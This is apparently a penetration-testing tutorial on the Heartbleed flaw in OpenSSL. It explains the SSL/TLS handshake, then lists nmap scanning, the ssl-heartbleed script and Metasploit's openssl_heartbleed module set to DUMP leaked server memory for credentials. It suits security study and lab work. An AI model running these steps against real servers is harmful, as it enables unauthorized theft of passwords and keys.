- Heartbleed Attack: -
- OpenSSL is a software library that implements the SSL (secure sockets layer) and TLS (transport layer security) web security protocols.
- SSL and TLS are methods for using cryptography to secure communication between two parties. Although there are some important differences at a technical level (and SSL has largely been made obsolete in favor of the more secure TLS), they both work essentially the same way. (In fact, many people simply refer to both protocols as “SSL.”)
- Once a connection is made between a client and server, the client requests a secure connection and states which types of cryptographic security it supports.
- The server chooses the most secure option that both the server and client support, and then sends a security certificate signed with the server’s public key.
- The client verifies the certificate and generates a secret key to send to the server, encrypted with the server’s public key.
- The client and server use the secret key to generate a pair of symmetric keys (or two pairs of public-private keys), and communication commences securely.
- Attack chain: -
- Attack surface: -
- Start by finding the SSL/HTTPS ports, scanning them with nmap.
- `nmap -sS <target ip address> -p<port number> -sV`
- nmap = tool name
- -sS = SYN (half-open) scan
- <target ip address> = e.g. 10.10.10.10
- <port number> = 443, 4443, etc.
- -sV = detect the service and version running on the port
- `nmap -sS <target ip address> -p<port number> --script ssl-heartbleed`
- --script = run NSE (Nmap Scripting Engine) scripts.
- ssl-heartbleed = one of the NSE scripts (many others are available). This tells us whether the target is vulnerable or not.
- If it is vulnerable, use Metasploit (several tools can do this, but Metasploit is the easiest).
- `msfconsole -q` (starts Metasploit on Kali; -q is quiet mode, which suppresses the banner)
- `use auxiliary/scanner/ssl/openssl_heartbleed`
- `show actions` - three actions are listed: DUMP, KEYS, SCAN.
- `set action DUMP` - dumps the leaked memory data to a file.
- `show options`
- Set RHOSTS and RPORT, plus any other required options.
- Before going forward, make sure you have logged in to the application multiple times with all possible users.
- `run` inside Metasploit. The dumped data is saved to a file.
- Check the saved file for the sensitive details we received.